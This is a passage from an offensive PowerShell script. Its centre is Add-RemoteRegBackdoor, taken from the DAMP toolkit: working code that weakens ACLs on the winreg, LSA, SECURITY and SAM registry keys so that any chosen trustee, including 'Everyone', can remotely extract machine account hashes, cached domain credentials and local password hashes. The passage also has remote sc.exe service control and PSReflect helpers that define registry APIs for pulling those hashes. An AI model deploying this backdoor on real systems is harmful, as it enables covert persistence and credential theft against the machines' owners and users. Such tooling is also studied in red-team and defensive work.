$ComputerName" sc.exe \\$ComputerNamestop stop dns sc.exe \\$ComputerName start dns } ########################################################################### ## Directly from the DAMP Toolkit - https://github.com/HarmJ0y/DAMP/ ## ########################################################################### function Add-RemoteRegBackdoor { <# .SYNOPSIS Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None .DESCRIPTION Adds an allow ACE with our specified trustee to the following registy keys: -HKEY_LOCAL_MACHINE:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg ^ controls access to remote registry -HKEY_LOCAL_MACHINE:\SYSTEM\CurrentControlSet\Control\Lsa\JD -HKEY_LOCAL_MACHINE:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1 -HKEY_LOCAL_MACHINE:\SYSTEM\CurrentControlSet\Control\Lsa\Data -HKEY_LOCAL_MACHINE:\SYSTEM\CurrentControlSet\Control\Lsa\GBG ^ needed to calculate the SysKey/bootkey -HKEY_LOCAL_MACHINE:\SECURITY key The following key contains the encrypted LSA key: HKEY_LOCAL_MACHINE:\SECURITY\Policy\PolEKList The following key contains the encrypted machine account hash: HKEY_LOCAL_MACHINE:\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal Domain cached credentials are stored in subkeys here: HKEY_LOCAL_MACHINE:\SECURITY\Cache\* -HKEY_LOCAL_MACHINE:\SAM\SAM\Domains\Account ^ local user hashes are stored in subkeys here Note: on some systems the LSA subkeys don't inherit permissions from their parent container, so we have to set those explicitly :( Combined, these malicious ACEs allow for the remote retrieval the system's computer account hash as well as local account hashes. These hashes can be retrieved with Get-RemoteMachineAccountHash and Get-RemoteLocalAccountHash, respectively. .PARAMETER ComputerName Specifies the hostname to add the backdoor trustee to. Defaults to the localhost. .PARAMETER Trustee Specifies the name ('DOMAIN\user') or the SID (S-1-...) of the trustee to add the backdoor for. Defaults to the current user. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the remote system. .EXAMPLE PS C:\Temp> Add-RemoteRegBackdoor -ComputerName client.external.local -Trustee 'S-1-1-0' -Verbose VERBOSE: [client.external.local : ] Using trustee username 'Everyone' VERBOSE: [client.external.local] Attaching to remote registry through StdRegProv VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key VERBOSE: [client.external.local : SECURITY\Policy] Backdooring started for key VERBOSE: [client.external.local : SECURITY\Policy] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SECURITY\Policy] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SECURITY\Policy] Applying Trustee to new Ace VERBOSE: [client.external.local : SECURITY\Policy] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SECURITY\Policy] Backdooring completed for key VERBOSE: [client.external.local : SAM\SAM\Domains\Account] Backdooring started for key VERBOSE: [client.external.local : SAM\SAM\Domains\Account] Creating ACE wit Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [client.external.local : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone' VERBOSE: [client.external.local : SAM\SAM\Domains\Account] Applying Trustee to new Ace VERBOSE: [client.external.local : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [client.external.local : SAM\SAM\Domains\Account] Backdooring completed for key VERBOSE: [client.external.local] Backdooring completed for system ComputerName BackdoorTrustee ------------ --------------- client.external.local S-1-1-0 Grants 'Everyone' the ability to remotely retrieve client.external.local's computer account hash and local account hashes. .EXAMPLE Add-RemoteRegBackdoor -ComputerName client.external.local -Trustee exteral\user Grants external\user the ability to remotely retrieve client.external.local's computer account hash and local account hashes. .EXAMPLE Add-RemoteRegBackdoor -ComputerName client.external.local -Trustee 'S-1-5-21-1857433065-1017388661-3096204114-1131' Grants the given domain security identifier the ability to remotely retrieve client.external.local's computer account hash and local account hashes. #> Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('dnshostname', 'HostName', 'name')] [ValidateNotNullOrEmpty()] [String[]] $ComputerName = $Env:COMPUTERNAME, [Parameter(Position = 1)] [Alias('principal', 'user', 'sid')] [String] $Trustee = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) ForEach ($Computer in $ComputerName) { $WmiArguments = @{ 'ComputerName' = $Computer } if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } # translate the trustee SID to domain\user, if needed $Domain, $User = $Null, $Null if ($Trustee -match '^S-1-.*') { try { $SID = [Security.Principal.SecurityIdentifier]$Trustee $UserObj = $SID.Translate([System.Security.Principal.NTAccount]) if ($UserObj.Value -match '.+\\.+') { $Domain,$User = $UserObj.Value.Split('\\') } else { $User = $UserObj.Value } } catch { Write-Error "[$Computer] Error resolving trustee: $_" return } } elseif ($Trustee -match '.+\\.+') { $Domain,$User = $Trustee.Split('\\') } else { $User = $Trustee } if ((-not $User) -or ($User -eq '')) { Write-Error "[$Computer] Error resolving trustee '$Trustee'" return } Write-Verbose "[$Computer : $Key] Using trustee username '$User'" if ($Domain) { Write-Verbose "[$Computer : $Key] Using trustee domain '$Domain'" } # step 0 -> ensure remote registry is running on the remote system try { $RemoteServiceObject = Get-WMIObject -Class Win32_Service -Filter "name='RemoteRegistry'" @WmiArguments if ($RemoteServiceObject.State -ne 'Running') { Write-Verbose "[$Computer] Remote registry is not running, attempting to start" $Null = $RemoteServiceObject.StartService() } } catch { Write-Error "[$Computer] Error interacting with the remote registry service: $_" return } # step 1 -> get a remote registry provider on the system through WMI try { Write-Verbose "[$Computer] Attaching to remote registry through StdRegProv" # Note: we have to use the WMI StdRegProv method as [Microsoft.Win32.RegistryKey] can't be used to set ACL information on remote keys: # https://social.technet.microsoft.com/Forums/windows/en-US/0beee366-ee8d-4052-b1b9-8ad9bf0f8ff0/set-remote-registry-acl-with-powershell-net?forum=winserverpowershell $Reg = Get-WmiObject -Namespace root/default -Class Meta_Class -Filter "__CLASS = 'StdRegProv'" @WmiArguments } catch { Write-Error "[$Computer] Error attaching to remote registry through StdRegProv" return } $Keys = @( 'SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg', 'SYSTEM\CurrentControlSet\Control\Lsa\JD', 'SYSTEM\CurrentControlSet\Control\Lsa\Skew1', 'SYSTEM\CurrentControlSet\Control\Lsa\Data', 'SYSTEM\CurrentControlSet\Control\Lsa\GBG', 'SECURITY', 'SAM\SAM\Domains\Account' ) ForEach($Key in $Keys) { Write-Verbose "[$Computer : $Key] Backdooring started for key" # first grab the existing security descriptor # 2147483650 = HKEY_LOCAL_MACHINE $RegSD = $Reg.GetSecurityDescriptor(2147483650, $Key).Descriptor Write-Verbose "[$Computer : $Key] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)" $RegAce = (New-Object System.Management.ManagementClass('win32_Ace')).CreateInstance() # 983103 == ALL_ACCESS $RegAce.AccessMask = 983103 # 2 == OBJECT_INHERIT_ACE $RegAce.AceFlags = 2 # 0x0 == 'Access Allowed' $RegAce.AceType = 0x0 Write-Verbose "[$Computer : $Key] Creating the trustee WMI object with user '$User'" $RegTrustee = (New-Object System.Management.ManagementClass('win32_Trustee')).CreateInstance() $RegTrustee.Name = $User if ($Domain) { $RegTrustee.Domain = $Domain } Write-Verbose "[$Computer : $Key] Applying Trustee to new Ace" $RegAce.Trustee = $RegTrustee # add the new ACE to the retrieved security descriptor $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject Write-Verbose "[$Computer : $Key] Calling SetSecurityDescriptor on the key with the newly created Ace" $Null = $Reg.SetSecurityDescriptor(2147483650, $Key, $RegSD.PSObject.ImmediateBaseObject) Write-Verbose "[$Computer : $Key] Backdooring completed for key" } Write-Verbose "[$Computer] Backdooring completed for system" $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ComputerName' $Computer $Out | Add-Member Noteproperty 'BackdoorTrustee' $Trustee $Out } } #region PSReflect function New-InMemoryModule { <# .SYNOPSIS Creates an in-memory assembly and module Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION When defining custom enums, structs, and unmanaged functions, it is necessary to associate to an assembly module. This helper function creates an in-memory module that can be passed to the 'enum', 'struct', and Add-Win32Type functions. .PARAMETER ModuleName Specifies the desired name for the in-memory assembly and module. If ModuleName is not provided, it will default to a GUID. .EXAMPLE $Module = New-InMemoryModule -ModuleName Win32 #> Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ModuleName = [Guid]::NewGuid().ToString() ) $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($Null, @()) $LoadedAssemblies = $AppDomain.GetAssemblies() foreach ($Assembly in $LoadedAssemblies) { if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) { return $Assembly } } $DynAssembly = New-Object Reflection.AssemblyName($ModuleName) $Domain = $AppDomain $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run') $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False) return $ModuleBuilder } function func { Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $DllName, [Parameter(Position = 1, Mandatory = $True)] [string] $FunctionName, [Parameter(Position = 2, Mandatory = $True)] [Type] $ReturnType, [Parameter(Position = 3)] [Type[]] $ParameterTypes, [Parameter(Position = 4)] [Runtime.InteropServices.CallingConvention] $NativeCallingConvention, [Parameter(Position = 5)] [Runtime.InteropServices.CharSet] $Charset, [String] $EntryPoint, [Switch] $SetLastError ) $Properties = @{ DllName = $DllName FunctionName = $FunctionName ReturnType = $ReturnType } if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes } if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention } if ($Charset) { $Properties['Charset'] = $Charset } if ($SetLastError) { $Properties['SetLastError'] = $SetLastError } if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint } New-Object PSObject -Property $Properties } function Add-Win32Type { <# .SYNOPSIS Creates a .NET type for an unmanaged Win32 function. Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: func .DESCRIPTION Add-Win32Type enables you to easily interact with unmanaged (i.e. Win32 unmanaged) functions in PowerShell. After providing Add-Win32Type with a function signature, a .NET type is created using reflection (i.e. csc.exe is never called like with Add-Type). The 'func' helper function can be used to reduce typing when defining multiple function definitions. .PARAMETER DllName The name of the DLL. .PARAMETER FunctionName The name of the target function. .PARAMETER ReturnType The return type of the function. .PARAMETER ParameterTypes The function parameters. .PARAMETER NativeCallingConvention Specifies the native calling convention of the function. Defaults to stdcall. .PARAMETER Charset If you need to explicitly call an 'A' or 'W' Win32 function, you can specify the character set. .PARAMETER SetLastError Indicates whether the callee calls the SetLastError Win32 API function before returning from the attributed method. .PARAMETER Module The in-memory module that will host the functions. Use New-InMemoryModule to define an in-memory module. .PARAMETER Namespace An optional namespace to prepend to the type. Add-Win32Type defaults to a namespace consisting only of the name of the DLL. .EXAMPLE $Mod = New-InMemoryModule -ModuleName Win32 $FunctionDefinitions = @( (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError), (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError), (func ntdll RtlGetCurrentPeb ([IntPtr]) @()) ) $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' $Kernel32 = $Types['kernel32'] $Ntdll = $Types['ntdll'] $Ntdll::RtlGetCurrentPeb() $ntdllbase = $Kernel32::GetModuleHandle('ntdll') $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb') .NOTES Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189 When defining multiple function prototypes, it is ideal to provide Add-Win32Type with an array of function signatures. That way, they are all incorporated into the same in-memory module. #> [OutputType([Hashtable])] Param( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [String] $DllName, [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [String] $FunctionName, [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [Type] $ReturnType, [Parameter(ValueFromPipelineByPropertyName = $True)] [Type[]] $ParameterTypes, [Parameter(ValueFromPipelineByPropertyName = $True)] [Runtime.InteropServices.CallingConvention] $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall, [Parameter(ValueFromPipelineByPropertyName = $True)] [Runtime.InteropServices.CharSet] $Charset = [Runtime.InteropServices.CharSet]::Auto, [Parameter(ValueFromPipelineByPropertyName = $True)] [Switch] $SetLastError, [Parameter(Mandatory = $True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, [ValidateNotNull()] [String] $Namespace = '' ) BEGIN { $TypeHash = @{} } PROCESS { if ($Module -is [Reflection.Assembly]) { if ($Namespace) { $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName") } else { $TypeHash[$DllName] = $Module.GetType($DllName) } } else { # Define one type for each DLL if (!$TypeHash.ContainsKey($DllName)) { if ($Namespace) { $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit') } else { $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit') } } $Method = $TypeHash[$DllName].DefineMethod( $FunctionName, 'Public,Static,PinvokeImpl', $ReturnType, $ParameterTypes) # Make each ByRef parameter an Out parameter $i = 1 ForEach($Parameter in $ParameterTypes) { if ($Parameter.IsByRef) { [void] $Method.DefineParameter($i, 'Out', $Null) } $i++ } $DllImport = [Runtime.InteropServices.DllImportAttribute] $SetLastErrorField = $DllImport.GetField('SetLastError') $CallingConventionField = $DllImport.GetField('CallingConvention') $CharsetField = $DllImport.GetField('CharSet') if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False } # Equivalent to C# version of [DllImport(DllName)] $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String]) $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor, $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(), [Reflection.FieldInfo[]] @($SetLastErrorField, $CallingConventionField, $CharsetField), [Object[]] @($SLEValue, ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), ([Runtime.InteropServices.CharSet] $Charset))) $Method.SetCustomAttribute($DllImportAttribute) } } END { if ($Module -is [Reflection.Assembly]) { return $TypeHash } $ReturnTypes = @{} ForEach ($Key in $TypeHash.Keys) { $Type = $TypeHash[$Key].CreateType() $ReturnTypes[$Key] = $Type } return $ReturnTypes } } function psenum { <# .SYNOPSIS Creates an in-memory enumeration for use in your PowerShell session. Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION The 'psenum' function facilitates the creation of enums entirely in memory using as close to a "C style" as PowerShell will allow. .PARAMETER Module The in-memory module that will host the enum. Use New-InMemoryModule to define an in-memory module. .PARAMETER FullName The fully-qualified name of the enum. .PARAMETER Type The type of each enum element. .PARAMETER EnumElements A hashtable of enum elements. .PARAMETER Bitfield Specifies that the enum should be treated as a bitfield. .EXAMPLE $Mod = New-InMemoryModule -ModuleName Win32 $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{ UNKNOWN = 0 NATIVE = 1 # Image doesn't require a subsystem. WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem. WINDOWS_CUI = 3 # Image runs in the Windows character subsystem. OS2_CUI = 5 # Image runs in the OS/2 character subsystem. POSIX_CUI = 7 # Image runs in the Posix character subsystem. NATIVE_WINDOWS = 8 # Image is a native Win9x driver. WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem. EFI_APPLICATION = 10 EFI_BOOT_SERVICE_DRIVER = 11 EFI_RUNTIME_DRIVER = 12 EFI_ROM = 13 XBOX = 14 WINDOWS_BOOT_APPLICATION = 16 } .NOTES PowerShell purists may disagree with the naming of this function but again, this was developed in such a way so as to emulate a "C style" definition as closely as possible. Sorry, I'm not going to name it New-Enum. :P #> [OutputType([Type])] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $FullName, [Parameter(Position = 2, Mandatory = $True)] [Type] $Type, [Parameter(Position = 3, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Hashtable] $EnumElements, [Switch] $Bitfield ) if ($Module -is [Reflection.Assembly]) { return ($Module.GetType($FullName)) } $EnumType = $Type -as [Type] $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType) if ($Bitfield) { $FlagsConstructor = [FlagsAttribute].GetConstructor(@()) $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @()) $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute) } ForEach ($Key in $EnumElements.Keys) { # Apply the specified enum type to each element $Null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType) } $EnumBuilder.CreateType() } function field { Param ( [Parameter(Position = 0, Mandatory = $True)] [UInt16] $Position, [Parameter(Position = 1, Mandatory = $True)] [Type] $Type, [Parameter(Position = 2)] [UInt16] $Offset, [Object[]] $MarshalAs ) @{ Position = $Position Type = $Type -as [Type] Offset = $Offset MarshalAs = $MarshalAs } } function struct { <# .SYNOPSIS Creates an in-memory struct for use in your PowerShell session. Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: field .DESCRIPTION The 'struct' function facilitates the creation of structs entirely in memory using as close to a "C style" as PowerShell will allow. Struct fields are specified using a hashtable where each field of the struct is comprosed of the order in which it should be defined, its .NET type, and optionally, its offset and special marshaling attributes. One of the features of 'struct' is that after your struct is defined, it will come with a built-in GetSize method as well as an explicit converter so that you can easily cast an IntPtr to the struct without relying upon calling SizeOf and/or PtrToStructure in the Marshal class. .PARAMETER Module The in-memory module that will host the struct. Use New-InMemoryModule to define an in-memory module. .PARAMETER FullName The fully-qualified name of the struct. .PARAMETER StructFields A hashtable of fields. Use the 'field' helper function to ease defining each field. .PARAMETER PackingSize Specifies the memory alignment of fields. .PARAMETER ExplicitLayout Indicates that an explicit offset for each field will be specified. .PARAMETER CharSet Dictates which character set marshaled strings should use. .EXAMPLE $Mod = New-InMemoryModule -ModuleName Win32 $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{ DOS_SIGNATURE = 0x5A4D OS2_SIGNATURE = 0x454E OS2_SIGNATURE_LE = 0x454C VXD_SIGNATURE = 0x454C } $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{ e_magic = field 0 $ImageDosSignature e_cblp = field 1 UInt16 e_cp = field 2 UInt16 e_crlc = field 3 UInt16 e_cparhdr = field 4 UInt16 e_minalloc = field 5 UInt16 e_maxalloc = field 6 UInt16 e_ss = field 7 UInt16 e_sp = field 8 UInt16 e_csum = field 9 UInt16 e_ip = field 10 UInt16 e_cs = field 11 UInt16 e_lfarlc = field 12 UInt16 e_ovno = field 13 UInt16 e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4) e_oemid = field 15 UInt16 e_oeminfo = field 16 UInt16 e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10) e_lfanew = field 18 Int32 } # Example of using an explicit layout in order to create a union. $TestUnion = struct $Mod TestUnion @{ field1 = field 0 UInt32 0 field2 = field 1 IntPtr 0 } -ExplicitLayout .NOTES PowerShell purists may disagree with the naming of this function but again, this was developed in such a way so as to emulate a "C style" definition as closely as possible. Sorry, I'm not going to name it New-Struct. :P #> [OutputType([Type])] Param ( [Parameter(Position = 1, Mandatory = $True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $FullName, [Parameter(Position = 3, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Hashtable] $StructFields, [Reflection.Emit.PackingSize] $PackingSize = [Reflection.Emit.PackingSize]::Unspecified, [Switch] $ExplicitLayout, [System.Runtime.InteropServices.CharSet] $CharSet = [System.Runtime.InteropServices.CharSet]::Ansi ) if ($Module -is [Reflection.Assembly]) { return ($Module.GetType($FullName)) } [Reflection.TypeAttributes] $StructAttributes = 'Class, Public, Sealed, BeforeFieldInit' if ($ExplicitLayout) { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout } else { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout } switch($CharSet) { Ansi { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::AnsiClass } Auto { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::AutoClass } Unicode { $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::UnicodeClass s} } $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize) $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) $Fields = New-Object Hashtable[]($StructFields.Count) # Sort each field according to the orders specified # Unfortunately, PSv2 doesn't have the luxury of the # hashtable [Ordered] accelerator. foreach ($Field in $StructFields.Keys) { $Index = $StructFields[$Field]['Position'] $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]} } foreach ($Field in $Fields) { $FieldName = $Field['FieldName'] $FieldProp = $Field['Properties'] $Offset = $FieldProp['Offset'] $Type = $FieldProp['Type'] $MarshalAs = $FieldProp['MarshalAs'] $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public') if ($MarshalAs) { $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType]) if ($MarshalAs[1]) { $Size = $MarshalAs[1] $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $UnmanagedType, $SizeConst, @($Size)) } else { $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType)) } $NewField.SetCustomAttribute($AttribBuilder) } if ($ExplicitLayout) { $NewField.SetOffset($Offset) } } # Make the struct aware of its own size. # No more having to call [Runtime.InteropServices.Marshal]::SizeOf! $SizeMethod = $StructBuilder.DefineMethod('GetSize', 'Public, Static', [Int], [Type[]] @()) $ILGenerator = $SizeMethod.GetILGenerator() # Thanks for the help, Jason Shirk! $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, [Type].GetMethod('GetTypeFromHandle')) $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type]))) $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret) # Allow for explicit casting from an IntPtr # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure! $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit', 'PrivateScope, Public, Static, HideBySig, SpecialName', $StructBuilder, [Type[]] @([IntPtr])) $ILGenerator2 = $ImplicitConverter.GetILGenerator() $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, [Type].GetMethod('GetTypeFromHandle')) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type]))) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret) $StructBuilder.CreateType() } $Module = New-InMemoryModule -ModuleName Win32 $LSA_UNICODE_STRING = struct $Module LSA_UNICODE_STRING @{ Length = field 0 UInt16 MaximumLength = field 1 UInt16 Buffer = field 2 IntPtr } $FunctionDefinitions = @( (func advapi32 RegConnectRegistry([UInt32]) @( [String], [Int32], [IntPtr].MakeByRefType() )-EntryPoint RegConnectRegistry -SetLastError), (func advapi32 RegOpenKeyEx([UInt32]) @( [IntPtr], [String], [Int], [Int], [IntPtr].MakeByRefType() )-EntryPoint RegOpenKeyEx -SetLastError), (func advapi32 RegQueryInfoKey([UInt32]) @( [IntPtr], [System.Text.StringBuilder] [Int].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr] )-EntryPoint RegQueryInfoKey -SetLastError) (func advapi32 RegQueryValueEx([UInt32]) @( [IntPtr], # _In_ HKEY hKey, [String], # _In_opt_ LPCTSTR lpValueName, [Int], # _Reserved_ LPDWORD lpReserved, [Int].MakeByRefType(), # _Out_opt_ LPDWORD lpType, [Byte[]], # _Out_opt_ LPBYTE lpData, [Int].MakeByRefType() # _Inout_opt_ LPDWORD lpcbData )-EntryPoint RegQueryValueEx -SetLastError) ) $Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'Win32' $Advapi32 = $Types['advapi32'] # compiled MD4 assembly adapted from 